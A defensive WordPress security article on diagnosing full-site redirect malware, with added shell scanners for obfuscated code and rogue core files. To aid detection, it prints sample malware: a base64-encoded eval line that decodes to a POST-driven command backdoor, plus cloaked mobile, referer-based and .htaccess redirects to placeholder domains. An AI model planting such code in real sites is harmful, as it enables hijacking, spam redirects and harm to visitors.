WordPress Redirect Malware: Diagnosing a Full-Site Redirect

A common sign of a serious WordPress compromise is when the entire website begins redirecting to another domain. In severe cases, even the /wp-admin login page redirects, preventing administrators from accessing the dashboard.

This article documents a real troubleshooting workflow used when a WordPress site began redirecting unexpectedly, including the admin panel.


Initial Symptom

The website began redirecting visitors to another destination. The redirect affected:

  • The homepage
  • Internal pages
  • The /wp-admin login page

When the WordPress admin panel also redirects, the problem is usually not limited to a plugin or theme. Instead, it typically indicates a deeper compromise affecting core files or server-level configuration.


Early Investigation

Before modifying files, the first step is identifying whether the redirect is happening inside WordPress or before WordPress loads.

The recommended diagnostic test is replacing the root index.php temporarily with a minimal script.

Test Procedure

  1. Rename the existing file /public_html/index.php to index_old.php.
  2. Create a new file named index.php with the following content:
<?php
echo "TEST OK";

Then open the site in a browser.

  • If the message appears → WordPress is causing the redirect.
  • If the redirect still occurs → the problem is outside WordPress (server or .htaccess).

Error Log Review

The server error log contained the following warnings:

PHP Warning: Undefined array key "rzp_webhook_data"
in /wp-content/plugins/woo-razorpay/includes/razorpay-webhook.php

PHP Warning: Undefined variable $error
in /wp-login.php

Interpretation

These warnings by themselves do not indicate malware.

  • The Razorpay warning indicates a missing webhook parameter in an incoming request.
  • The $error warning may appear when the login code has been modified or corrupted.

However, because the redirect also affected wp-admin, the cause likely lies elsewhere than in these two files.


Common Locations Where Redirect Malware Is Placed

Attackers typically inject redirect logic into one of these locations:

  • .htaccess in the site root
  • index.php
  • wp-config.php
  • wp-admin or wp-includes rogue PHP files
  • compromised plugins or themes

Redirect malware is usually hidden in obfuscated PHP, recognisable by constructs such as:

  • base64_decode()
  • gzinflate()
  • eval()
  • long encoded strings

Server-Level Redirects

When both the website and admin panel redirect, the redirect is often implemented using:

  • malicious rewrite rules in .htaccess
  • injected PHP inside the root entry files
  • server-level compromises

This is why checking the root files is critical before attempting plugin-level troubleshooting.


Files That Must Be Checked First

During a redirect investigation, the following files should always be inspected first:

  • /public_html/.htaccess
  • /public_html/index.php
  • /public_html/wp-config.php
  • /public_html/wp-admin/

Unexpected files or directories inside wp-admin may indicate a backdoor.


Indicators of a Compromised WordPress Installation

  • Admin login redirecting to another site
  • Unknown PHP files inside WordPress core directories
  • Encoded or obfuscated code inside entry files
  • Modified core WordPress files
  • Unexpected rewrite rules

Immediate Containment Strategy

If a site is actively redirecting visitors:

  • Disable the redirect entry point by replacing index.php.
  • Inspect .htaccess for malicious rewrite rules.
  • Review server error logs for anomalies.
  • Check WordPress core directories for unauthorized files.

Only after identifying the infection location should files be cleaned or restored.


Conclusion

Full-site redirects affecting both the frontend and wp-admin usually indicate a deeper compromise than a typical plugin vulnerability.

By isolating whether the redirect occurs before or after WordPress loads, administrators can determine whether the infection resides in WordPress itself or at the server configuration level.

A structured diagnostic approach helps prevent unnecessary guesswork and reduces recovery time.


Common Redirect Malware Patterns Found in WordPress Sites

Redirect malware in WordPress rarely appears as a simple redirect statement. Attackers usually hide the redirect inside obfuscated PHP code so that it is difficult to detect during manual inspection.

Below are several patterns commonly observed in compromised WordPress installations.


1. Base64 Encoded Redirect Payloads

One of the most common techniques is encoding malicious code using base64. This hides the actual redirect logic from casual inspection.

Example pattern:

<?php
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));

When decoded, the payload may contain logic that:

  • checks if the visitor is a search engine crawler
  • redirects only real visitors
  • hides the redirect from site administrators

This technique allows attackers to maintain the redirect while avoiding detection during basic site checks.


2. Conditional Mobile Redirects

Some infections redirect only mobile visitors while leaving desktop traffic unaffected. This allows attackers to avoid detection by site administrators who typically test the site from desktop devices.

Example pattern:

if(preg_match('/iphone|android|mobile/i', $_SERVER['HTTP_USER_AGENT'])) {
    header("Location: https://malicious-domain.example");
    exit;
}

Because the redirect triggers only on certain devices, it may appear that the site functions normally.


3. Search Engine Cloaking Redirects

Another common tactic is redirecting users who arrive from search engines while allowing direct visitors to view the normal website.

Example logic:

if(isset($_SERVER['HTTP_REFERER']) 
   && strpos($_SERVER['HTTP_REFERER'], 'google') !== false) {
    header("Location: https://spam-domain.example");
    exit;
}

This method allows attackers to exploit organic search traffic without immediately alerting the site owner.


4. Hidden Redirects Inside .htaccess

Some infections modify the root .htaccess file to insert rewrite rules that redirect visitors.

Example pattern:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} !googlebot [NC]
RewriteRule ^(.*)$ https://spam-domain.example [R=302,L]

Because the web server applies .htaccess rules before WordPress loads, this type of redirect affects the entire site, including the admin login.
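As an added example that is not part of the original article, the shell script below applies the indicator list from the diagnostic section (eval, base64_decode, gzinflate, long encoded strings) to the root entry files and checks .htaccess for rewrite rules that send visitors to an external URL, like the pattern above. All scanned file contents are constructed inline; spam-domain.example is the placeholder already used on this page.

```shell
#!/bin/sh
# Added example, not from the original article. Scans root entry files for the
# obfuscation indicators named in the text and checks .htaccess for external
# redirects. All file contents below are constructed for the demonstration.

# Exit 0 (suspicious) when FILE calls eval/base64_decode/gzinflate or holds an
# unbroken run of 80+ base64-alphabet characters; exit 1 when it looks clean.
scan_php_file() {
    hits=0
    if grep -Eq '(eval|base64_decode|gzinflate)[[:space:]]*\(' "$1"; then
        echo "$1: calls a decoding/eval function"; hits=1
    fi
    if grep -Eq '[A-Za-z0-9+/=]{80,}' "$1"; then
        echo "$1: contains a long encoded string"; hits=1
    fi
    [ "$hits" -eq 1 ]
}

# Exit 0 when a RewriteRule target is an absolute http(s) URL. WordPress's own
# rules only rewrite to the local /index.php, so an external target is a red flag.
scan_htaccess() {
    if grep -Eiq '^[[:space:]]*RewriteRule[[:space:]]+[^[:space:]]+[[:space:]]+https?://' "$1"
    then
        echo "$1: rewrite rule redirects to an external URL"; return 0
    fi
    return 1
}

work=$(mktemp -d)
# Constructed: what a stock WordPress root index.php contains.
printf '%s\n' '<?php' "define( 'WP_USE_THEMES', true );" \
    "require __DIR__ . '/wp-blog-header.php';" > "$work/index_clean.php"
# Constructed: the same file with an encoded payload injected at the top.
blob=$(awk 'BEGIN { for (i = 0; i < 30; i++) printf "QUJD" }')
printf '%s\n' '<?php' "\$p = '$blob';" 'eval(base64_decode($p));' \
    "require __DIR__ . '/wp-blog-header.php';" > "$work/index_infected.php"
# Constructed: the rewrite redirect from the text vs. the standard WordPress block.
printf '%s\n' 'RewriteEngine On' 'RewriteCond %{HTTP_USER_AGENT} !googlebot [NC]' \
    'RewriteRule ^(.*)$ https://spam-domain.example [R=302,L]' > "$work/htaccess_infected"
printf '%s\n' 'RewriteEngine On' 'RewriteBase /' 'RewriteRule ^index\.php$ - [L]' \
    'RewriteCond %{REQUEST_FILENAME} !-f' 'RewriteRule . /index.php [L]' > "$work/htaccess_clean"

for f in "$work/index_clean.php" "$work/index_infected.php"; do
    scan_php_file "$f" || echo "$f: no obfuscation indicators"
done
for f in "$work/htaccess_clean" "$work/htaccess_infected"; do
    scan_htaccess "$f" || echo "$f: no external redirect rules"
done
```

A hit from either function is a reason to inspect the file by hand, not proof of infection: legitimate plugins also call base64_decode, so the match on the root entry files specifically is what matters.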


5. Rogue PHP Files in Core Directories

Attackers often place hidden PHP backdoors inside WordPress core folders such as:

  • wp-admin
  • wp-includes
  • wp-content/uploads

These files may use harmless names such as:

  • class-wp.php
  • wp-system.php
  • cache.php
  • test.php

These backdoors allow attackers to re-infect the website even after visible malware is removed.
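The rogue-file check described in this section, as an added example that is not part of the original article: it compares the PHP files in wp-admin and wp-includes against a known-good file list and flags any PHP under wp-content/uploads. The site tree, the manifest and the file names are constructed for the demonstration (the rogue names are the ones listed above).

```shell
#!/bin/sh
# Added example, not from the original article. Lists PHP files that do not
# belong in WordPress core directories. The site tree and the known-good
# manifest are constructed here; on a real host the manifest would be the file
# list of a pristine copy of the same WordPress release.

# Print, relative to ROOT, every .php file under wp-admin and wp-includes that
# is absent from the sorted MANIFEST, then every .php file under
# wp-content/uploads, which should never hold executable PHP at all.
find_rogue_php() {
    (
        cd "$1" || exit 1
        find wp-admin wp-includes -type f -name '*.php' | sort | comm -23 - "$2"
        find wp-content/uploads -type f -name '*.php' | sort
    )
}

work=$(mktemp -d)
site=$work/site
mkdir -p "$site/wp-admin" "$site/wp-includes" "$site/wp-content/uploads/2024"
# Constructed tree: a few legitimate core files (class-wp.php really does live in
# wp-includes) plus rogue files using the harmless-looking names from the text.
# Note wp-admin/class-wp.php: a legitimate file name placed in the wrong directory.
for f in wp-admin/index.php wp-admin/admin.php wp-includes/class-wp.php \
         wp-includes/version.php wp-admin/class-wp.php wp-admin/test.php \
         wp-includes/wp-system.php wp-content/uploads/2024/cache.php; do
    : > "$site/$f"
done
# Constructed manifest of the files that should exist (must be sorted for comm).
printf '%s\n' wp-admin/index.php wp-admin/admin.php wp-includes/class-wp.php \
    wp-includes/version.php | sort > "$work/manifest.txt"

find_rogue_php "$site" "$work/manifest.txt"
```

On a live site, WP-CLI's wp core verify-checksums performs the hashed version of this comparison against the official release manifest, which also catches modified core files rather than only added ones.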


Why Redirect Malware Persists

Many compromised WordPress sites become reinfected because a hidden backdoor remains on the server. Even if the visible redirect code is removed, attackers can use the backdoor to restore the infection later.

Typical persistence mechanisms include:

  • hidden PHP shells
  • cron-based reinfection scripts
  • malicious plugins disguised as legitimate extensions
  • modified WordPress core files

Key Lesson

When a WordPress site begins redirecting unexpectedly, the problem is rarely limited to a single file. A proper investigation should assume that the attacker has placed both a visible payload and a hidden persistence mechanism.

Removing only the redirect code without identifying the underlying backdoor almost always results in the site being compromised again.